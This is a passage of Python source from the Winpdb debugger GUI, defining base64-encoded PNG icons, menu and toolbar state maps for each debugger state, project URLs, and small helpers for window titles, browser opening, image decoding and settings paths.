BASE64_GOTO = 'iVBORw0KGgoAAAANSUhEUgAAABcAAAAVCAYAAACt4nWrAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA\nwElEQVQ4y+2SsQ4BURBFz65o9gP0Eo1WoaBW0ejVqmn8B53GL2hG4Su0ColMQpQ+gEpWs8Vms8uT\ntyTErd7Mm5x7Mxn4VgXZRmM4jzOtLbAEZqZy9YInBhHQAsbAKJnbAz1TOXnBM0YDYAVUgA3QMZWb\nCzx8NmAqa2CalG1g4po8dJxbpN79UuGmckiV3bKTp1V9J5wyryUu+DqaSt0LXmRgKoF38jwDF/DL\nerCiH1Ph7qJa03kFl/Mu+Pid/5WrO8B7LfQd3oiRAAAAAElFTkSuQmCC\n'
BASE64_LOCKED = "iVBORw0KGgoAAAANSUhEUgAAABcAAAAVCAYAAACt4nWrAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAhUlEQVR42u2UQRLAEAxFP+NguRm5WW6WbrRjOkqorurvmHiR5ANsVeQsQSlBb2u3JHtKUBFRAApAcyK1nPU9MJGAiM4qXd6HJYHvBRTg4Zb4LwcaZgZa7rcqcaPASpzZdRfYop5zwoJnMNdz5paLBADNw2NsmhQiv7s58/u/6YmgCxhbdR19GFJ+yzjAWQAAAABJRU5ErkJggg=="
BASE64_UNLOCKED = "iVBORw0KGgoAAAANSUhEUgAAABcAAAAVCAYAAACt4nWrAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAjklEQVR42u1TQQ7DIAyzUR8WXkb4WX7mnSqtFetCxU6rb0jYJLYBHgzAOyR36HTmkmncoYgQSZGUO0RSo7tlVtgsUGuFJEoiALQmjB4os5PvwhlLyi8D3TKBLWtLVrh3HuxJBZbBVUO+2oJFtd3GK38mmAUAuy/e2hXFEPF3k/fOZZ/ooJSp146pjj94xwuYKl+HgD9iOwAAAABJRU5ErkJggg=="
BASE64_EXCEPTION = 'iVBORw0KGgoAAAANSUhEUgAAABcAAAAVCAYAAACt4nWrAAAACXBIWXMAAAsTAAALEwEAmpwYAAAC\nD0lEQVQ4y+2UTUsbURSGn9zcNJMQSVPH7CxMBF0EjIugmxaEbJq9UNv5DfoL3Ar+AH+BJf1aCm6E\nuHLXEJrFLCK0QoUS2kAYCpkxTu50kTjGfBHBpWd37znnPR/3vS882RgLTXNms2UJbAshTE3T8kKE\nU0p1W67rVpRSH4FPllXwHgyezZaXpZRfdD29lkwmEUIEPqUUtm3TbP6peZ731rIK9ZnBs9nysqbF\nzhcXXy5IKSdO5nkeV1e//rqu83pcgdC4VUgpK4axlLsFDodhdTWKrgsajS6W1UGpuwKXlz9rnneT\nH17RuLa2dT0dAM/NCfb2npPJRIKAev2G/f0WjuMjpUTXF3KNxu93wIdBIDGMLIQwk8lkcDbNBJlM\nhNNTh52dJicnbVZWImxtJYKY/pu8H8Eavuix4u56YyMKwNmZg1JQLjv4PqyvRwcbQtO0/DCWHO08\nnAqcMkQi0St0cPDiXtz8vJiYNxFcqW4L0AG6XR/H8YnFQuzuNmm3fYToFe10/HF509fS/yAA+D5U\nq9cAFItxlILNzRiHhzqmmbjHe9d1KzN0rkq2bb9JpXpTHh39wzAiFItxisU4AK2W4vi4HeTYto1S\nqjQrz78ZxtLaLR0jkRC53DPS6TC2rahWr3Ecf4DnP2qe543w/LF+6CvLKlw8VFu+6no6N0Vbvve1\n5eKxVbEEfJ6mik821v4D0B75yPNHQ9UAAAAASUVORK5CYII=\n'
BASE64_TRAP = "iVBORw0KGgoAAAANSUhEUgAAABcAAAAVCAYAAACt4nWrAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA\nB3RJTUUH1wMWBzIMELT6ewAAAixJREFUeNrNlVtIkwEUx39z35zOteU252X6hbNpEeZW5oUyejC7\naEEIERhRPVTMhx6rh3rLqCB8iaSHejGiqF588QJFD3bZg4HQCsNLuE2deNk3v29urtV7N9RvQef1\nnPPjcPif/4F/GFrVBEdOFUm7jmRU+jmVoY7c1EIw7zCajNTvsuuGl3DVa8TalkNFEGUylBZ4B1fK\nPVRdg6mmbAqXTzi6P6Rl50fZ7HlPb1uuJWSOxMyCicon/dGDg3+q16wW3FBEvcHG5XoX04qE/vmA\neXmUyAXVanFS3crG0JmLl9Dt8GAaHWOLaIw/TQZNcj4Oayk1FnBbJT7NrwlewLH2JeabHZZpf2UV\nzlIRo82OYTzBAckQPzT3fWHviDSzTyZel0WDlODz+KrgG6g7KRNs0RCRY7JUkJTILRaxlXuw2woJ\nGc34ZQVhbjah6OKuzkUG3q568gSB4eraxsBU8OuLPamKNxOTS8VlrnjBVjeZgS8MPbxH5sQwvjJl\nZ9dHfP51n4uYxblGJw9edXCj5xYDrW5e70I83ld936lKLdnk7naIC+e9pwjPjlA2NsiiEsx53IPc\nr0otetyub0TPxldi7wJhtgfCzNgi3HmmrPhUOUdzzc1KHY67AoXXBUydwOm19P91LTo2eVMs12vQ\nhCD1Mkm4Ly1erCf/iBZrr0DRbT21rrSZvIC4X4u1W0dJuxrOL66YxTYRojVgfOQyN3el9TUJ5DXo\nMTv53+MHY3Sxa+ko45EAAAAASUVORK5CYII=\n"
BASE64_FORK = "iVBORw0KGgoAAAANSUhEUgAAABcAAAAVBAMAAABfzGiYAAAAD1BMVEWZAACsqJn///8BAQEAAIBm\nb8BsAAAAAXRSTlMAQObYZgAAAAFiS0dEAIgFHUgAAAAJcEhZcwAACxMAAAsTAQCanBgAAAAHdElN\nRQfXBwQRJRb/bmGBAAAAT0lEQVQY02NgIA4wCoIAjKMEBIoMDlg4ysa4ZJSMjY0VWVyQZFhcXFyQ\nZViQ9UA4ysZGCA6KDEiPi4sDC5JpKMpYQGbDXe3igOQXFnweBQD3YA+4tU+1lQAAAABJRU5ErkJg\ngg==\n"
BASE64_ICON_16 = 'iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABmJLR0QA/wD/AP+gvaeTAAAACXBI\nWXMAAAsTAAALEwEAmpwYAAAAB3RJTUUH1wceCwAVoIFxgQAAAqdJREFUOMuFkltIFFEYx/9zdnN3\nci+E2Wq7uWp4rcBbSQaBRCClUg/lUz0URYTRi1FPgWBIBT1UZpAPERSRmERkN6UI8yExtdhYUTeV\ndbNdXW8zszPn7Mz04CXcNP8vh3O+8/+d7/vOx2FRN560WwRFPRdRWKWsRF2irIQEMdIeGhu49+Fh\n/TjWEAcAdY/eZzFVb5MUli4pDJJMsbzKNBz2D53ofXbzDQAtFmC4/rjdqkT1Tklh6X+NDJJCIckM\nERrlidlauZE3vwuPeQOxACIq6nlJYWlLZlFmEBUKUWaQKIOqagBHrFb3rqsA+H8AksIqRZlCVBhE\nmS6/POn3waBRCMFRmAwqUpOM+5/fyq96ebskYSVAps6VdTPMB0ZwuigJTWdLUXesGG65D/tSgnZX\nAqkuy6OeroacMgBkMQMaXmgWw9xMeCYiK+rO7hdIE8IYbG3FBq8H6b39KLAMQaeMGJnk2J3BNd+5\nmLoXAGcUxEiHHEW+qFBEhPkQH282lY94eb2lBQcIwReOQ6HPh2xhFgFzHIEOGAksh/eYr10Ayo3T\nAd9d3eY8I1PVruoghc5wNCfRCo/HgwCACQAHzQR8igGIclsAHQCwLZGUuBzx2w0/ez/N2VNyvUbe\nVgHo3NG075KtIM7G+oMwUx3gCZJqkmHP5GExw7rcPA6Gr8NaB7e0zyo9XmzZmnG5sbTNne+medBU\nTIeisG0ywmTiVp3CoupfR2Ij/ETLjksOu1aLdTQ+pf92VXkPkZjzSPegfl/VyNR6gKcfhTYAvlgA\nKq78CPYMq6dUjYusZX7bQ7tqGv0NAGYNq11oejU56HRYOjfbDJlWniQTbmFoAmE9+OC10HyyfrQW\nQB8AjftPlhwAS3aqLbMkl88Y8FP6+dv0KAAfgBks/ucfwdhZh0OZfFUAAAAASUVORK5CYII=\n'
BASE64_ICON_32 = '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\nTxVPItzU3gAAAABJRU5ErkJggg==\n'
BASE64_ICON_64 = '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\n'
SB_LINE = "Line"
SB_COL = "Col"
SB_STATE = "State"
SB_ENCRYPTION = "Encryption"
SHOW = "Show"
VALUE = "Value"
BITMAP = "Bitmap"
STATE_SPAWNING_MENU = {ENABLED: [ML_STOP, ML_DETACH], DISABLED: [ML_ANALYZE, ML_GO, ML_BREAK, ML_STEP, ML_NEXT, ML_RETURN, ML_JUMP, ML_GOTO, ML_TOGGLE, ML_DISABLE, ML_ENABLE, ML_CLEAR, ML_LOAD, ML_MORE, ML_SAVE, ML_OPEN, ML_PWD, ML_LAUNCH, ML_ATTACH, ML_RESTART]}
STATE_ATTACHING_MENU = {ENABLED: [ML_STOP, ML_DETACH], DISABLED: [ML_ANALYZE, ML_GO, ML_BREAK, ML_STEP, ML_NEXT, ML_RETURN, ML_JUMP, ML_GOTO, ML_TOGGLE, ML_DISABLE, ML_ENABLE, ML_CLEAR, ML_LOAD, ML_MORE, ML_SAVE, ML_OPEN, ML_PWD, ML_LAUNCH, ML_ATTACH, ML_RESTART]}
STATE_BROKEN_MENU = {ENABLED: [ML_ANALYZE, ML_GO, ML_STEP, ML_NEXT, ML_RETURN, ML_JUMP, ML_GOTO, ML_TOGGLE, ML_DISABLE, ML_ENABLE, ML_CLEAR, ML_LOAD, ML_MORE, ML_SAVE, ML_OPEN, ML_STOP, ML_DETACH, ML_RESTART], DISABLED: [ML_PWD, ML_LAUNCH, ML_ATTACH, ML_BREAK]}
STATE_ANALYZE_MENU = {ENABLED: [ML_ANALYZE, ML_TOGGLE, ML_DISABLE, ML_ENABLE, ML_CLEAR, ML_LOAD, ML_MORE, ML_SAVE, ML_OPEN, ML_STOP, ML_DETACH, ML_RESTART], DISABLED: [ML_PWD, ML_LAUNCH, ML_ATTACH, ML_BREAK, ML_GO, ML_STEP, ML_NEXT, ML_RETURN, ML_JUMP, ML_GOTO]}
STATE_RUNNING_MENU = {ENABLED: [ML_BREAK, ML_TOGGLE, ML_DISABLE, ML_ENABLE, ML_CLEAR, ML_LOAD, ML_MORE, ML_SAVE, ML_OPEN, ML_STOP, ML_DETACH, ML_RESTART], DISABLED: [ML_ANALYZE, ML_PWD, ML_LAUNCH, ML_ATTACH, ML_GO, ML_STEP, ML_NEXT, ML_RETURN, ML_JUMP, ML_GOTO]}
STATE_DETACHED_MENU = {ENABLED: [ML_PWD, ML_LAUNCH, ML_ATTACH], DISABLED: [ML_ANALYZE, ML_GO, ML_BREAK, ML_STEP, ML_NEXT, ML_RETURN, ML_JUMP, ML_GOTO, ML_TOGGLE, ML_DISABLE, ML_ENABLE, ML_CLEAR, ML_LOAD, ML_MORE, ML_SAVE, ML_OPEN, ML_STOP, ML_DETACH, ML_RESTART]}
STATE_DETACHING_MENU = {ENABLED: [ML_STOP, ML_DETACH], DISABLED: [ML_ANALYZE, ML_GO, ML_BREAK, ML_STEP, ML_NEXT, ML_RETURN, ML_JUMP, ML_GOTO, ML_TOGGLE, ML_DISABLE, ML_ENABLE, ML_CLEAR, ML_LOAD, ML_MORE, ML_SAVE, ML_OPEN, ML_PWD, ML_LAUNCH, ML_ATTACH, ML_RESTART]}
STATE_BROKEN_TOOLBAR = {ENABLED: [TB_EXCEPTION, TB_FILTER, TB_GO, TB_STEP, TB_NEXT, TB_RETURN, TB_GOTO], DISABLED: [TB_BREAK]}
STATE_ANALYZE_TOOLBAR = {ENABLED: [TB_EXCEPTION, TB_FILTER], DISABLED: [TB_BREAK, TB_GO, TB_STEP, TB_NEXT, TB_RETURN, TB_GOTO]}
STATE_RUNNING_TOOLBAR = {ENABLED: [TB_BREAK], DISABLED: [TB_EXCEPTION, TB_FILTER, TB_GO, TB_STEP, TB_NEXT, TB_RETURN, TB_GOTO]}
STATE_SPAWNING_TOOLBAR = {ENABLED: [], DISABLED: [TB_EXCEPTION, TB_FILTER, TB_BREAK, TB_GO, TB_STEP, TB_NEXT, TB_RETURN, TB_GOTO]}
STATE_ATTACHING_TOOLBAR = {ENABLED: [], DISABLED: [TB_EXCEPTION, TB_FILTER, TB_BREAK, TB_GO, TB_STEP, TB_NEXT, TB_RETURN, TB_GOTO]}
STATE_DETACHED_TOOLBAR = {ENABLED: [], DISABLED: [TB_EXCEPTION, TB_FILTER, TB_BREAK, TB_GO, TB_STEP, TB_NEXT, TB_RETURN, TB_GOTO]}
STATE_DETACHING_TOOLBAR = {ENABLED: [], DISABLED: [TB_EXCEPTION, TB_FILTER, TB_BREAK, TB_GO, TB_STEP, TB_NEXT, TB_RETURN, TB_GOTO]}
STATE_MAP = {
rpdb2.STATE_SPAWNING: (STATE_SPAWNING_MENU, STATE_SPAWNING_TOOLBAR),
rpdb2.STATE_ATTACHING: (STATE_ATTACHING_MENU, STATE_ATTACHING_TOOLBAR),
rpdb2.STATE_BROKEN: (STATE_BROKEN_MENU, STATE_BROKEN_TOOLBAR),
rpdb2.STATE_ANALYZE: (STATE_ANALYZE_MENU, STATE_ANALYZE_TOOLBAR),
rpdb2.STATE_RUNNING: (STATE_RUNNING_MENU, STATE_RUNNING_TOOLBAR),
rpdb2.STATE_DETACHED: (STATE_DETACHED_MENU, STATE_DETACHED_TOOLBAR),
rpdb2.STATE_DETACHING: (STATE_DETACHING_MENU, STATE_DETACHING_TOOLBAR)
}
LICENSE_TITLE = 'License.'
ABOUT_TITLE = 'About ' + WINPDB_TITLE
ABOUT_HTML_PREFIX = """
<html>
<body>
<p>
"""
ABOUT_HTML_SUFFIX = """
</p>
</body>
</html>
"""
WEBSITE_URL = "http://www.winpdb.org/"
SUPPORT_URL = "http://www.winpdb.org/?page_id=4"
DOCS_URL = "http://www.winpdb.org/?page_id=5"
EXT_DOCS_URL = "http://www.winpdb.org/?page_id=17"
UPDATES_URL = "http://www.winpdb.org/?page_id=3"
STR_ERROR_INTERFACE_COMPATIBILITY = "The rpdb2 module which was found by Winpdb is of unexpected version (version expected: %s, version found: %s). Please upgrade to the latest versions of winpdb.py and rpdb2.py."
STR_NAMESPACE_DEADLOCK = 'Data Retrieval Timeout'
STR_NAMESPACE_LOADING = 'Loading...'
BAD_FILE_WARNING_TIMEOUT_SEC = 10.0
DIRTY_CACHE = 1
POSITION_TIMEOUT = 2.0
FILTER_LEVELS = ['Off', 'Medium', 'Maximum']
g_ignored_warnings = {'': True}
g_fUnicode = 'unicode' in wx.PlatformInfo
assert(g_fUnicode or not rpdb2.is_py3k())
def calc_title(path):
(dn, bn) = os.path.split(path)
if dn == '':
return '%s - %s' % (bn, WINPDB_TITLE)
if os.name != rpdb2.POSIX:
return '%s (%s) - %s' % (bn, rpdb2.calc_suffix(dn, 64), WINPDB_TITLE)
home = os.path.expanduser('~')
if dn.startswith(home):
dn = '~' + dn[len(home):]
return '%s (%s) - %s' % (bn, rpdb2.calc_suffix(dn, 64), WINPDB_TITLE)
def calc_denominator(string_list):
if string_list in [[], None]:
return ''
d = string_list[0]
for s in string_list[1:]:
i = 0
while i < min(len(d), len(s)):
if d[i] != s[i]:
break
i += 1
if i == 0:
return ''
d = d[:i]
return d
def open_new(url):
if sys.version.startswith('2.5.') and 'ubuntu' in sys.version:
w = webbrowser.get()
if 'firefox' in w.name:
cmd = '%s -new-window "%s"' % (w.name, url)
os.popen(cmd)
return
webbrowser.open_new(url)
def image_from_base64(str_b64):
b = rpdb2.as_bytes(str_b64)
s = base64.decodestring(b)
stream = cStringIO.StringIO(s)
image = wx.ImageFromStream(stream)
return image
class CSettings:
def __init__(self, default_settings):
self.m_dict = default_settings
def calc_path(self):
if os.name == rpdb2.POSIX:
home = os.path.expanduser('~')
path = os.path.join(home, '.' + WINPDB_SETTINGS_FILENAME)
return path
#
# gettempdir() is used since it works with unicode user names on
